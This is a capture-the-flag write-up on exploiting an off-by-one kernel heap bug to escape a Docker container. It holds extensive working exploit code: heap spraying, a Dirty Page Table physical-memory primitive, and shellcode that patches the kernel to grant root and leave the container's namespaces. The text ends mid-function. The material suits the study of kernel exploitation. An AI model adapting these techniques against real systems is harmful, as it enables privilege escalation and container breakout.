corCTF2022 corjail
Table of Contents
Problem⌗
Environment⌗
- linux version: 5.10.127
- CONFIG_SLUB_DEBUG=y
- CONFIG_SLUB=y
- CONFIG_SLAB_FREELIST_RANDOM=y
- CONFIG_SLAB_FREELIST_HARDENED=y
Simple description⌗
The goal of this challenge is escaping docker with seccomp-ed environment by using off-by-one in kmalloc-4k.
The seccomp filter prohibits us from using struct msg_msg and struct msg_msgseg.
So we need to find a new structure that lets us exploit the off-by-one. And after achieving RIP control (ROP, or something…), we have to LPE and escape the docker container.
Module⌗
The module is simple: it just prints the call count of each syscall and lets us filter which syscalls' call counts will be counted.
It utilizes Syscall statistics patch based on https://lwn.net/Articles/896474/ (check out build/build_kernel.sh).
I think this function is only one we must read:
// IDA-style pseudocode of the vulnerable /proc/cormon write handler
// (decompiled from the challenge module; unk_* symbols are format strings).
int64_t cormon_proc_write(struct file *file, const char *src, size_t size,
                          loff_t *ppos) {
  size_t v5; // rbp -- number of bytes copied from userspace
  const char *v7; // rbx -- kernel buffer from kmalloc-4096
  if (*ppos < 0) return -22LL; // -EINVAL
  if (size == 0 || (unsigned __int64)*ppos > 0xFFF) return 0LL;
  // NOTE: only size > 0x1000 is clamped to 4095; size == 0x1000 keeps v5 = 0x1000.
  if (size > 0x1000)
    v5 = 4095LL;
  else
    v5 = size;
  v7 = (const char *)kmem_cache_alloc_trace(
      kmalloc_caches[12], 2592LL,
      4096LL); // SLAB_CACHE = kmalloc-4096 (0x800 < size <= 0x1000)
  printk(&unk_578, v7);
  if (v7) {
    _check_object_size(v7, v5, 0LL);
    if (copy_from_user(v7, src, v5)) {
      printk(&unk_5D0, src);
      return -14LL; // -EFAULT (note: v7 is leaked on this path)
    } else {
      v7[v5] = 0; // off-by-one when size=0x1000 -> v5=0x1000
      if ((unsigned int)update_filter(v7)) {
        kfree(v7);
        return -22LL; // -EINVAL: filter string did not parse
      } else {
        kfree(v7);
        return size;
      }
    }
  } else {
    printk(&unk_5A0, 0LL);
    return -12LL; // -ENOMEM
  }
}
Vulnerability⌗
As I wrote in the above pseudocode, the vulnerability (an off-by-one) occurs at v7[v5] = 0;.
Okay… this off-by-one in kmalloc-4k is the whole challenge…
Exploit⌗
Haha… okay… how can we exploit an off-by-one in kmalloc-4k without struct msg_msg…?
I tried 3 approaches and solved it with the last one (I think the first one was too complex and the second one does not work…).
First approach (using struct poll_list)⌗
Finding victim object⌗
My first approach is to exploit a structure whose first member is a pointer like struct ??? *next or a refcount like atomic_t ???_count, atomic_long_t ???_count, etc.
If the structure has a next pointer, we can make a UAF by releasing the object, and the same holds if it has a refcount.
So I try finding these objects using CodeQL.
// CodeQL query: find struct types allocated via kmalloc/kzalloc whose first
// member (byte offset 0) looks overwrite-friendly (list_head, a *count*
// field, or a member referring back to the type), where the allocation size
// is either a constant landing in kmalloc-4k or user-controlled.
import cpp
from Field f, Type ty, PointerType p, FunctionCall call
where
  (
    // allocation sites of interest
    call.getTarget().getName() = "kmalloc" or
    call.getTarget().getName() = "kzalloc"
  ) and
  // the allocation result is used as a pointer to the candidate type
  call.getActualType() = p and
  p.refersTo(ty) and
  // constrain to the FIRST field of the candidate struct
  f.getByteOffset() = 0 and
  f.getDeclaringType() = ty and
  (
    f.getType().getName() = "list_head" or
    f.getName().matches("%count%") or
    f.getType().refersToDirectly(ty)
  ) and
  (
    (
      // constant size in (2048, 4096] -> kmalloc-4k
      call.getArgument(0).getValue().toInt() > 2048 and
      call.getArgument(0).getValue().toInt() <= 4096
    ) or
    // or a size chosen at runtime (possibly user-controlled)
    not call.getArgument(0).isConstant()
  )
select ty.getName(),
  ty.getLocation().toString(),
  call.getLocation().toString()
And the result is the following:
| col0 | col1 | col2 |
+-------------------------+---------------------------------------------------------+-----------------------------------------------------+
| workqueue_struct | kernel/workqueue.c:239:8:239:23 | kernel/workqueue.c:4288:7:4288:13 |
| posix_acl | include/linux/posix_acl.h:27:8:27:16 | fs/posix_acl.c:181:26:181:32 |
| msg_msg | include/linux/msg.h:9:8:9:14 | ipc/msgutil.c:53:8:53:14 |
| sem_undo | ipc/sem.c:146:8:146:15 | ipc/sem.c:1940:8:1940:14 |
| list_head | include/linux/types.h:178:8:178:16 | fs/dcookies.c:236:22:236:28 |
| list_head | tools/include/linux/types.h:69:8:69:16 | fs/dcookies.c:236:22:236:28 |
| perf_buffer | kernel/events/internal.h:13:8:13:18 | kernel/events/ring_buffer.c:815:7:815:13 |
| vmbus_channel_msginfo | include/linux/hyperv.h:707:8:707:28 | drivers/hv/channel.c:271:16:271:22 |
| vmbus_channel_msginfo | include/linux/hyperv.h:707:8:707:28 | drivers/hv/channel.c:308:14:308:20 |
| vmbus_channel_msginfo | include/linux/hyperv.h:707:8:707:28 | drivers/hv/channel.c:352:15:352:21 |
| vmbus_channel_msginfo | include/linux/hyperv.h:707:8:707:28 | drivers/hv/vmbus_drv.c:2473:12:2473:18 |
| blk_plug_cb | include/linux/blkdev.h:1262:8:1262:18 | block/blk-core.c:1743:7:1743:13 |
| audit_tree | kernel/audit_tree.c:13:8:13:17 | kernel/audit_tree.c:97:9:97:15 |
| apertures_struct | include/linux/fb.h:495:9:495:24 | include/linux/fb.h:509:6:509:12 |
| Scsi_Host | include/scsi/scsi_host.h:524:8:524:16 | drivers/scsi/hosts.c:386:10:386:16 |
| neighbour | include/net/neighbour.h:134:8:134:16 | net/core/neighbour.c:453:13:453:19 |
| neighbour | include/net/neighbour.h:134:8:134:16 | net/core/neighbour.c:406:6:406:12 |
| netdev_hw_addr | include/linux/netdevice.h:209:8:209:21 | net/core/dev_addr_lists.c:30:7:30:13 |
| cpu_rmap | include/linux/cpu_rmap.h:24:8:24:15 | lib/cpu_rmap.c:39:9:39:15 |
| poll_list | fs/select.c:839:8:839:16 | fs/select.c:1005:23:1005:29 |
| hpets | drivers/char/hpet.c:104:8:104:12 | drivers/char/hpet.c:858:10:858:16 |
| resource_entry | include/linux/resource_ext.h:23:8:23:21 | kernel/resource.c:1701:10:1701:16 |
| journal_replay | drivers/md/bcache/journal.h:83:8:83:21 | drivers/md/bcache/journal.c:150:8:150:14 |
| md_rdev | drivers/md/md.h:48:8:48:14 | drivers/md/raid0.c:149:18:149:24 |
| hv_dr_state | drivers/pci/controller/pci-hyperv.c:517:8:517:18 | drivers/pci/controller/pci-hyperv.c:2266:7:2266:13 |
| hv_dr_state | drivers/pci/controller/pci-hyperv.c:517:8:517:18 | drivers/pci/controller/pci-hyperv.c:2231:7:2231:13 |
| iscsi_bus_flash_conn | include/scsi/scsi_transport_iscsi.h:318:8:318:27 | drivers/scsi/scsi_transport_iscsi.c:1286:15:1286:21 |
| iscsi_bus_flash_session | include/scsi/scsi_transport_iscsi.h:363:8:363:30 | drivers/scsi/scsi_transport_iscsi.c:1237:15:1237:21 |
| iscsi_cls_conn | include/scsi/scsi_transport_iscsi.h:202:8:202:21 | drivers/scsi/scsi_transport_iscsi.c:2401:9:2401:15 |
| iscsi_cls_session | include/scsi/scsi_transport_iscsi.h:241:8:241:24 | drivers/scsi/scsi_transport_iscsi.c:2040:12:2040:18 |
| tcmu_tmr | drivers/target/target_core_user.c:192:8:192:15 | drivers/target/target_core_user.c:1270:8:1270:14 |
| ext4_xattr_inode_array | fs/ext4/xattr.h:119:8:119:29 | fs/ext4/xattr.c:2822:15:2822:21 |
| fscache_cache_tag | include/linux/fscache-cache.h:43:8:43:24 | fs/fscache/cache.c:41:9:41:15 |
| mr_table | include/linux/mroute_base.h:241:8:241:15 | net/ipv4/ipmr_base.c:41:8:41:14 |
| pneigh_entry | include/net/neighbour.h:171:8:171:19 | net/core/neighbour.c:1714:23:1714:29 |
| pneigh_entry | include/net/neighbour.h:171:8:171:19 | net/core/neighbour.c:737:6:737:12 |
| fib_rule | include/net/fib_rules.h:20:8:20:15 | net/core/fib_rules.c:544:11:544:17 |
| fib_rule | include/net/fib_rules.h:20:8:20:15 | net/core/fib_rules.c:60:6:60:12 |
| msg_msgseg | ipc/msgutil.c:37:8:37:17 | ipc/msgutil.c:68:9:68:15 |
| audit_chunk | kernel/audit_tree.c:25:8:25:18 | kernel/audit_tree.c:193:10:193:16 |
| kprobe_insn_page | kernel/kprobes.c:90:8:90:23 | kernel/kprobes.c:172:8:172:14 |
| kmalloced_param | kernel/params.c:39:8:39:22 | kernel/params.c:50:6:50:12 |
| nested_table | lib/rhashtable.c:32:7:32:18 | lib/rhashtable.c:133:9:133:15 |
| nf_queue_entry | include/net/netfilter/nf_queue.h:12:8:12:21 | net/netfilter/nf_queue.c:204:10:204:16 |
| tls_rec | include/net/tls.h:99:8:99:14 | net/tls/tls_sw.c:337:8:337:14 |
| nh_group | include/net/nexthop.h:75:8:75:15 | net/ipv4/nexthop.c:138:8:138:14 |
| ctnl_timeout | include/net/netfilter/nf_conntrack_timeout.h:20:8:20:19 | net/netfilter/nfnetlink_cttimeout.c:133:12:133:18 |
| recent_entry | net/netfilter/xt_recent.c:66:8:66:19 | net/netfilter/xt_recent.c:191:6:191:12 |
| counted_str | security/apparmor/include/lib.h:93:8:93:18 | security/apparmor/lib.c:139:8:139:14 |
| aa_label | security/apparmor/include/label.h:125:8:125:15 | security/apparmor/domain.c:1404:9:1406:38 |
| aa_label | security/apparmor/include/label.h:125:8:125:15 | security/apparmor/domain.c:813:9:816:23 |
| aa_label | security/apparmor/include/label.h:125:8:125:15 | security/apparmor/domain.c:825:9:829:23 |
| aa_label | security/apparmor/include/label.h:125:8:125:15 | security/apparmor/label.c:428:8:428:14 |
| aa_label | security/apparmor/include/label.h:125:8:125:15 | security/apparmor/domain.c:1117:8:1119:37 |
| aa_label | security/apparmor/include/label.h:125:8:125:15 | security/apparmor/domain.c:895:9:897:25 |
| aa_label | security/apparmor/include/label.h:125:8:125:15 | security/apparmor/mount.c:707:11:709:27 |
| aa_buffer | security/apparmor/lsm.c:47:7:47:15 | security/apparmor/lsm.c:1691:12:1691:18 |
| aa_buffer | security/apparmor/lsm.c:47:7:47:15 | security/apparmor/lsm.c:1611:11:1611:17 |
| ima_rule_opt_list | security/integrity/ima/ima_policy.c:63:8:63:24 | security/integrity/ima/ima_policy.c:288:13:288:19 |
I looked up these structures and struct poll_list is useful.
Because it has struct poll_list *next at offset 0, it is allocated by poll system call, and its size is provided by user.
How to spray poll?⌗
I want to spray struct poll_list in kmalloc-4k. Therefore I can allocate it and release it when I want.
But since poll blocks the calling program, we allocate it on another thread (actually we need to allocate it in another process).
I tried it using pthread_create but the thread was not created. So I decided to use clone.
/*
 * clone() entry point: park a poll(2) call for `timeout_ms` milliseconds so
 * the kernel keeps a struct poll_list alive in kmalloc-4k for that long.
 *
 * nfds is sized so the kernel's SECOND struct poll_list chunk is a full
 * 0x1000 allocation: the first 30 entries ((256-16)/8) live in do_sys_poll's
 * on-stack buffer, the next 510 ((0x1000-16)/8) in a kmalloc-4k poll_list
 * (see fs/select.c) -- TODO confirm against the 5.10.127 sources.
 *
 * BUG FIX: the function is declared int (clone() reports this value as the
 * child's exit status) but had no return statement, which is undefined
 * behavior when the value is used.  malloc() is now also checked.
 */
int create_poll(void *timeout_ms) {
  pin_to_core(0);
  const int timeout = (int)(int64_t)timeout_ms;
  const int size = (256 - 16) / 8 + (0x1000 - 16) / 8;
  struct pollfd *fds = malloc(size * sizeof(struct pollfd));
  if (fds == NULL) {
    return -1; // no spray happened; caller sees a nonzero exit status
  }
  for (int i = 0; i < size; i++) {
    fds[i].fd = 0xdead0000 + i; // invalid fds: poll just waits for the timeout
    fds[i].events = POLLIN;
  }
  poll(fds, size, timeout);
  free(fds);
  return 0;
}
#define CLONE_STACK_HEAP_ALLOC_COUNT (1024 * 1024)
/*
 * Spawn a CLONE_VM child that blocks in poll() for `timeout_ms` ms.
 * Returns the child pid, or -1 on failure.
 *
 * BUG FIXES versus the original:
 *  - clone(2) expects a pointer to the TOP of the child stack (stacks grow
 *    down on x86-64); passing the base made the child run off the buffer.
 *  - the stack was a 1 MiB automatic array in this frame, but with CLONE_VM
 *    the child keeps using it after this function returns (use-after-return).
 *    It is now heap-allocated and intentionally leaked while the child runs.
 */
int create_poll_via_clone(int timeout_ms) {
  char *child_stack = malloc(CLONE_STACK_HEAP_ALLOC_COUNT);
  if (child_stack == NULL) {
    return -1;
  }
  int pid = clone(create_poll, child_stack + CLONE_STACK_HEAP_ALLOC_COUNT,
                  CLONE_VM | SIGCHLD, (void *)(int64_t)timeout_ms);
  if (pid < 0) {
    free(child_stack); // clone failed: nothing is using the stack
  }
  return pid;
}
SLUBStick⌗
Now I can spray struct poll_list and trigger off-by-one.
But as you know, we cannot ensure off-by-one will corrupt struct poll_list’s struct poll_list *next.
I decide to use SLUBStick for gathering struct poll_lists in one (or consecutive) slab cache.
Originally SLUBStick is for a cross-cache attack, and a cross-cache attack requires that target objects be in one slab cache.
By using SLUBStick we can spray struct poll_lists on one (or consecutive) slab cache.
And so the off-by-one will corrupt its next with high stability.
Find another approach⌗
At this time, I think how I can exploit using struct poll_list.
My plan was the following:
- Spray struct poll_list with its next in kmalloc-8, kmalloc-16, kmalloc-32, kmalloc-64, kmalloc-128, or kmalloc-192 (let me call it the target cache from now on)
- Trigger the off-by-one and make a UAF in the target cache
- Leak the kernel base to bypass KASLR using an object in the target cache
- Do a cross-cache attack on the target cache and make a UAF in kmalloc-1k (for using struct tty_struct)
- Do ROP using struct user_key_payload or other objects
Hmm… This requires a cross-cache attack, and its stability is low, as we know. That's why I tried another approach.
PS. the author’s write-up might do similar thing without cross-cache. Leak address of struct tty_struct using struct tty_file_private and make UAF on that struct tty_struct. And do ROP.
Second approach (using PageJack)⌗
After searching for methods that can exploit an off-by-one, I found PageJack. It does not require a KASLR bypass, cross-cache, etc., and only requires the off-by-one (or OOB write).
WoW… I tried it immediately…. But it does not work…. WHY?!?!
Why PageJack does not work?⌗
PageJack utilize struct page *page of struct pipe_buffer.
With off-by-one (or OOB write) we can overwrite least significant byte of page and make physical page level UAF as a result.
After page level UAF, spraying struct file will make the UAF page filp cache (the filp cache uses only one page).
The struct files allocated on new filp cache (it’s UAF page) and we have write primitive on it via pipe.
We can modify fmode_t f_mode of struct file via pipe as a result.
Everything is okay except the const struct file_operations *f_op.
The write process is following:
flowchart TD sys_write[sys_write] --> ksys_write ksys_write[ksys_write] --> vfs_write vfs_write[vfs_write] --> write[file->f_op->write] vfs_write[vfs_write] --> new_sync_write[new_sync_write] new_sync_write[new_sync_write] --> write_iter[file->f_op->write_iter] click sys_write "https://elixir.bootlin.com/linux/v5.10.127/source/fs/read_write.c#L667" click ksys_write "https://elixir.bootlin.com/linux/v5.10.127/source/fs/read_write.c#L647" click vfs_write "https://elixir.bootlin.com/linux/v5.10.127/source/fs/read_write.c#L585" click new_sync_write "https://elixir.bootlin.com/linux/v5.10.127/source/fs/read_write.c#L507" click call_write_iter "https://elixir.bootlin.com/linux/v5.10.127/source/include/linux/fs.h#L1900"
Unlike host environment, in docker container f_op is ovl_file_operations.
So, when call file->f_op->write or file->f_op->write_iter, the called function is not same as host and the f_mode is checked again in ovl_write_iter (check it yourself!).
PS. the pew challenge of CodeGate 2025 Qual is solved easily by PageJack PoC (we need to modify the poc very very little).
Last approach (using struct pipe_buffer and Dirty Page Table)⌗
We cannot use PageJack but we can get physical page level UAF by using it partially. So, then, we can use Dirty Page Table.
UAF page to PTE page⌗
We can spray PTEs via mmap and cause page faults by writing to each mapping. But when I tried it like below, I failed to allocate PTEs on the UAF page.
// First (FAILED) attempt: reserve the VMAs, free the victim pipe's page,
// then fault every page in, hoping the newly allocated PTE pages reuse the
// freed pipe page.
for (int i = 0; i < MMAP_SPRAY_COUNT; ++i) {
  mmap_addrs[i] = mmap((void *)(MMAP_SPRAT_START_ADDR + i * MMAP_SPRAT_STEP),
                       MMAP_SPRAT_SIZE, PROT_READ | PROT_WRITE,
                       MAP_ANONYMOUS | MAP_SHARED, -1, 0);
  if (mmap_addrs[i] == MAP_FAILED) {
    fatal("mmap");
  }
}
sched_yield();
close_pipe_at(victim_pipe_fds[1]); // Make UAF page
for (int i = 0; i < MMAP_SPRAY_COUNT; ++i) {
  for (int j = 0; j < MMAP_SPRAT_SIZE / MMAP_PAGE_SIZE; ++j) {
    uint64_t *addr = (uint64_t *)(mmap_addrs[i] + MMAP_PAGE_SIZE * j);
    // unique stamp per page: high half = mapping index, low half = page index
    const uint64_t val = ((uint64_t)i << 32) + j * 0x01010101;
    *addr = val;
  }
}
Why doesn't this work..?? I don't know, but the code below works…
// Working variant: identical to the first attempt, except that a batch of
// struct file objects is sprayed and released (open/close of "/") between
// freeing the pipe page and faulting in the PTEs.  In practice this extra
// allocator churn was needed for a PTE page to land in the freed page.
for (int i = 0; i < MMAP_SPRAY_COUNT; ++i) {
  mmap_addrs[i] = mmap((void *)(MMAP_SPRAT_START_ADDR + i * MMAP_SPRAT_STEP),
                       MMAP_SPRAT_SIZE, PROT_READ | PROT_WRITE,
                       MAP_ANONYMOUS | MAP_SHARED, -1, 0);
  if (mmap_addrs[i] == MAP_FAILED) {
    fatal("mmap");
  }
}
sched_yield();
close_pipe_at(victim_pipe_fds[1]); // Make UAF page
for (int i = 0; i < FILE_SPRAY_COUNT; ++i) {
  file_fds[i] = open("/", O_RDONLY);
  if (file_fds[i] < 0) {
    fatal("open");
  }
}
for (int i = 0; i < FILE_SPRAY_COUNT; ++i) {
  close(file_fds[i]);
}
for (int i = 0; i < MMAP_SPRAY_COUNT; ++i) {
  for (int j = 0; j < MMAP_SPRAT_SIZE / MMAP_PAGE_SIZE; ++j) {
    uint64_t *addr = (uint64_t *)(mmap_addrs[i] + MMAP_PAGE_SIZE * j);
    // unique stamp per page, used later to locate the corrupted mapping
    const uint64_t val = ((uint64_t)i << 32) + j * 0x01010101;
    *addr = val;
  }
}
Anyway, using the above code, we can modify PTEs for mmapped memory via the pipe.
Leak physical kernel base⌗
Each PTE has its own flags and PFN(Page Frame Number; it’s just <physical address> >> 12).
And thus we can arbitrary read and write physical memory with modified PTE.
So our approach is patch kernel code to escape docker and We need to know physical kernel base address for that.
The linux loads kernel at different physical memory.
But there is a way to leak it: dmabuf at PA:0x9c000 (I don’t know what is it and why there is it..).
The physical kernel base will be *( *(uint64_t*)(PA:0x9c000)&(~0xfff) - 0x2004000ULL).
PS. If KASLR is disabled, physical kernel base will be *( *(uint64_t*)(PA:0x9c000)&(~0xfff) - 0x2001000ULL).
Patch sys_modify_ldt⌗
Now we can patch kernel’s code. So I patch modify_ldt syscall and call it.
The patched modify_ldt will be the following:
// Shellcode that replaces __x64_sys_modify_ldt in the kernel text.
// Compiled using https://defuse.ca/online-x86-assembler.htm
// We need `endbr64` if CFI is enabled (check out https://en.wikipedia.org/wiki/Control-flow_integrity and https://en.wikipedia.org/wiki/Indirect_branch_tracking)
// r15 is computed as the (virtual) kernel base; all targets are base+offset.
call get_rip;
get_rip:
pop r15;
sub r15, 0x252f0; // &__x64_sys_modify_ldt - kbase == 0x252f0
sub r15, 5; // call get_rip; takes 5 bytes
// call commit_creds(&init_cred);
lea rdi, [r15 + 0x145a960]; // &init_cred - kbase == 0x145a960
lea rax, [r15 + 0xeba40]; // &commit_creds - kbase == 0xeba40
call rax;
// task = find_task_by_vpid(1);
// call switch_task_namespaces(task, &init_nsproxy);
mov rdi, 1;
lea rax, [r15 + 0xe4fc0]; // &find_task_by_vpid - kbase == 0xe4fc0
call rax; // find_task_by_vpid(1)
mov rdi, rax; // task
lea rsi, [r15 + 0x145a720]; // &init_nsproxy - kbase == 0x145a720
lea rax, [r15 + 0xea4e0]; // &switch_task_namespaces - kbase == 0xea4e0
call rax; // switch_task_namespaces(task, &init_nsproxy);
// current = find_task_by_vpid(pid);
// current->fs = copy_fs_struct(&init_fs);
lea rdi, [r15 + 0x1589740]; // &init_fs - kbase == 0x1589740
lea rax, [r15 + 0x2e7350]; // &copy_fs_struct - kbase == 0x2e7350
call rax; // copy_fs_struct(&init_fs);
mov rbx, rax; // new_fs
mov rdi, 0x1111111111111111; // pid: will be fixed up at runtime
lea rax, [r15 + 0xe4fc0]; // &find_task_by_vpid - kbase == 0xe4fc0
call rax; // current = find_task_by_vpid(pid)
mov [rax + 0x6e0], rbx; // current->fs = new_fs
// bypass kpti: build an iretq frame for swapgs_restore_regs_and_return_to_usermode
xor rax, rax;
mov [rsp + 0x00], rax;
mov [rsp + 0x08], rax;
mov rax, 0x2222222222222222; // user_ip: will be fixed
mov [rsp + 0x10], rax;
mov rax, 0x3333333333333333; // user_cs: will be fixed
mov [rsp + 0x18], rax;
mov rax, 0x4444444444444444; // user_rflags: will be fixed
mov [rsp + 0x20], rax;
mov rax, 0x5555555555555555; // user_sp: will be fixed
mov [rsp + 0x28], rax;
mov rax, 0x6666666666666666; // user_ss: will be fixed
mov [rsp + 0x30], rax;
lea rax, [r15 + 0xc00f06]; // bypass_kpti - kbase == 0xc00f06; bypass_kpti is in swapgs_restore_regs_and_return_to_usermode
jmp rax; // bypass_kpti
Exploit code⌗
#define _GNU_SOURCE
#include <fcntl.h>
#include <linux/keyctl.h>
#include <poll.h>
#include <pthread.h>
#include <sched.h>
#include <stdarg.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <sys/wait.h>
#include <syscall.h>
#include <unistd.h>
#define KERNEL_BASE_START 0xffffffff81000000
#define KERNEL_BASE_END 0xffffffffc0000000
#define KERNEL_BASE_MASK (~0x00000000000fffff)
#define IS_IN_KERNEL_RANGE(addr) \
((addr) >= KERNEL_BASE_START && (addr) < KERNEL_BASE_END)
#define _PAGE_PRESENT (1ULL << 0) // Page is present in memory
#define _PAGE_RW (1ULL << 1) // Read/Write permission (1: writable)
#define _PAGE_USER (1ULL << 2) // User/Supervisor mode (1: user-accessible)
#define _PAGE_PWT (1ULL << 3) // Page Write-Through (1: write-through enabled)
#define _PAGE_PCD (1ULL << 4) // Page Cache Disable (1: caching disabled)
#define _PAGE_ACCESSED (1ULL << 5) // Accessed bit (1: page has been accessed)
#define _PAGE_DIRTY (1ULL << 6) // Dirty bit (1: page has been modified)
#define _PAGE_PSE \
(1ULL << 7) // Page Size Extension (1: 2MB/1GB page, 0: 4KB page)
#define _PAGE_GLOBAL \
(1ULL << 8) // Global page (1: remains in TLB across context switches)
#define _PAGE_NX (1ULL << 63) // No-Execute bit (1: execution is prohibited)
#define PTE_FLAGS_MASK \
0xFFF0000000000FFFULL // Mask to extract the lower 12-bit flag field
#define PTE_PFN_MASK \
(~PTE_FLAGS_MASK) // Mask to extract the PFN (Page Frame Number)
// Macro to extract the PFN from a PTE
#define PTE_TO_PFN(pte) (((pte) & PTE_PFN_MASK) >> PAGE_SHIFT)
#define PAGE_DEFAULT_FLAGS \
(_PAGE_PRESENT | _PAGE_RW | _PAGE_USER | _PAGE_ACCESSED)
// Cache utils from https://github.com/isec-tugraz/SLUBStick
#ifndef HIDEMINMAX
#define MAX(X, Y) (((X) > (Y)) ? (X) : (Y))
#define MIN(X, Y) (((X) < (Y)) ? (X) : (Y))
#endif
static size_t rdtsc(void);
/*
 * Timestamp read without extra fences.
 * CLEANUP: the original body had its own (unfenced) rdtsc sequence AFTER the
 * first `return rdtsc();`, i.e. unreachable dead code -- removed.  The
 * observable behavior (delegating to the fenced rdtsc()) is unchanged.
 */
static inline size_t rdtsc_nofence(void) {
  return rdtsc();
}
/* Serialized TSC read: mfence on both sides so surrounding memory traffic
 * cannot drift across the measurement. */
static inline size_t rdtsc(void) {
  size_t lo, hi;
  __asm__ __volatile__("mfence");
  __asm__ __volatile__("rdtsc" : "=a"(lo), "=d"(hi));
  __asm__ __volatile__("mfence");
  return (hi << 32) | lo;
}
/* TSC read for the START of a timed region: mfence drains earlier memory
 * ops, the trailing lfence keeps the measured work from starting early. */
static inline size_t rdtsc_begin(void) {
  size_t lo, hi;
  __asm__ __volatile__("mfence");
  __asm__ __volatile__("rdtsc" : "=a"(lo), "=d"(hi));
  __asm__ __volatile__("lfence");
  return (hi << 32) | lo;
}
/* TSC read for the END of a timed region: leading lfence waits for the
 * measured work, trailing mfence orders it against whatever follows. */
static inline size_t rdtsc_end(void) {
  size_t lo, hi;
  __asm__ __volatile__("lfence");
  __asm__ __volatile__("rdtsc" : "=a"(lo), "=d"(hi));
  __asm__ __volatile__("mfence");
  return (hi << 32) | lo;
}
void pin_to_core(size_t core);
static void get_enter_to_continue(const char *msg);
static void fatal(const char *msg);
/* Pin the calling thread to one CPU so slab/timing behavior is stable;
 * aborts the exploit via fatal() if the affinity call fails. */
void pin_to_core(size_t core) {
  cpu_set_t mask;
  CPU_ZERO(&mask);
  CPU_SET(core, &mask);
  const int rc = sched_setaffinity(0, sizeof(mask), &mask);
  if (rc != 0) {
    fatal("sched_setaffinity");
  }
}
/* Print a prompt (with trailing newline, like puts) and block on stdin. */
static void get_enter_to_continue(const char *msg) {
  fputs(msg, stdout);
  fputc('\n', stdout);
  (void)getchar();
}
/* Report `msg` plus strerror(errno) and abort the whole exploit with the
 * original nonzero status (-1 -> 255). */
static void fatal(const char *msg) {
  perror(msg);
  // get_enter_to_continue("Press enter to exit...");
  exit(-1);
}
/**
* type must be "keyring", "user", "logon", or "big_key"
*/
static int32_t sys_add_key(const char *type, const char *desc,
const void *payload, size_t plen, int ringid);
static int32_t sys_keyctl(int cmd, ...);
static int32_t sys_revoke_key(int32_t key);
static int32_t sys_update_key(int32_t key, void *payload, size_t size);
static int32_t sys_read_key(int32_t key, char *buf, size_t size);
/* Raw add_key(2) wrapper (the target image has no libkeyutils). */
static int32_t sys_add_key(const char *type, const char *desc,
                           const void *payload, size_t plen, int ringid) {
  const long ret = syscall(__NR_add_key, type, desc, payload, plen, ringid);
  return (int32_t)ret;
}
/* Raw keyctl(2) wrapper: always forwards four extra long arguments
 * (callers passing fewer rely on the kernel ignoring the surplus). */
static int32_t sys_keyctl(int cmd, ...) {
  long args[4];
  va_list ap;
  va_start(ap, cmd);
  for (int i = 0; i < 4; ++i) {
    args[i] = va_arg(ap, long);
  }
  va_end(ap);
  return syscall(__NR_keyctl, cmd, args[0], args[1], args[2], args[3]);
}
/* keyctl(KEYCTL_REVOKE): mark the key revoked. */
static int32_t sys_revoke_key(int32_t key) {
  const int32_t rc = sys_keyctl(KEYCTL_REVOKE, key);
  return rc;
}
/* keyctl(KEYCTL_READ): copy the key payload into `buf` (up to `size`). */
static int32_t sys_read_key(int32_t key, char *buf, size_t size) {
  const int32_t rc = sys_keyctl(KEYCTL_READ, key, buf, size);
  return rc;
}
/* keyctl(KEYCTL_UPDATE): replace the key payload. */
static int32_t sys_update_key(int32_t key, void *payload, size_t size) {
  const int32_t rc = sys_keyctl(KEYCTL_UPDATE, key, payload, size);
  return rc;
}
int vuln_fd;
static void off_by_one_in_kmalloc_4k(void);
/* Write exactly 0x1000 bytes to /proc_rw/cormon: the handler then performs
 * buf[0x1000] = 0, the single-byte overflow into the next kmalloc-4k object. */
static void off_by_one_in_kmalloc_4k(void) {
  char payload[0x1000] = {0};
  write(vuln_fd, payload, sizeof(payload));
}
#define HEAP_ALLOC_COUNT 1000
int pipe_fds[HEAP_ALLOC_COUNT][2];
/* Create pipe `idx`, enlarge its ring to 64 pages, and seed it with a
 * recognizable 16-byte tag ("UNIGURI@" + 0xdeadbeef........|idx) used later
 * to detect overlapping pipe pages.  Returns 0 on success, -1 otherwise. */
int alloc_4k_pipe_at(uint64_t idx) {
  int *fds = pipe_fds[idx];
  int failed = 0;
  if (pipe(fds) != 0) {
    failed = 1;
  }
  if (fcntl(fds[1], F_SETPIPE_SZ, 0x1000 * 64) < 0) {
    failed = 1;
  }
  const char tag[] = "UNIGURI@";
  const uint64_t magic = 0xdeadbeef00000000 + idx;
  write(fds[1], tag, 8);
  write(fds[1], &magic, 8);
  return failed ? -1 : 0;
}
/* Close both ends of pipe `idx`, skipping stdio fds (<=2) and slots already
 * marked closed (-1); closed slots are reset to -1. */
void close_pipe_at(size_t idx) {
  for (int end = 0; end < 2; ++end) {
    const int fd = pipe_fds[idx][end];
    if (fd > 2) {
      close(fd);
      pipe_fds[idx][end] = -1;
    }
  }
}
size_t last_idx_in_slab[HEAP_ALLOC_COUNT];
int pipe_cnt = 0;
/*
 * Timing side channel over kmalloc-4k: allocate one pipe buffer at a time
 * and time an add_key() (whose big description also hits kmalloc-4k --
 * TODO confirm cache) right after it.  A slow add_key suggests the slab ran
 * out and a fresh one was taken from the page allocator; boundaries exactly
 * 8 allocations apart indicate densely packed slabs (8 objects each).
 * After `slab_cnt` consecutive boundaries the current slab is topped up so
 * the next allocation starts a fresh slab.  Returns 0 on success, -1 if the
 * pattern was never observed (caller retries).
 */
int make_kmalloc_4k_slab_full(const int slab_cnt) {
  pipe_cnt = 0;
  int add_key_res[HEAP_ALLOC_COUNT]; // NOTE(review): never written; leftover
  size_t times[HEAP_ALLOC_COUNT] = {
      0,
  };
  const char type[] = "keyring";
  char desc[0x1000]; // near-page-sized description for the timed allocation
  memset(desc, '.', sizeof(desc));
  desc[sizeof(desc) - 1] = 0;
  size_t last = 0; // index of the last detected slab boundary
  memset(last_idx_in_slab, 0, sizeof(last_idx_in_slab));
  size_t running = 0; // consecutive boundaries seen so far
  int finded = 0;
  for (int i = 0; i < HEAP_ALLOC_COUNT; ++i) {
    sched_yield();
    int pipe_res = alloc_4k_pipe_at(i);
    const size_t t1 = rdtsc_begin();
    sys_add_key(type, desc, NULL, 0, 0);
    const size_t t2 = rdtsc_end();
    times[i] = t2 - t1;
    if (pipe_res < 0) {
      break;
    }
    ++pipe_cnt;
    // empirical cycle thresholds for "this add_key grabbed a new slab"
    if (times[i] > 8000 && (i == 0 || times[i] - times[i - 1] > 1500)) {
      if (last == 0) {
        last = i;
        last_idx_in_slab[running] = i;
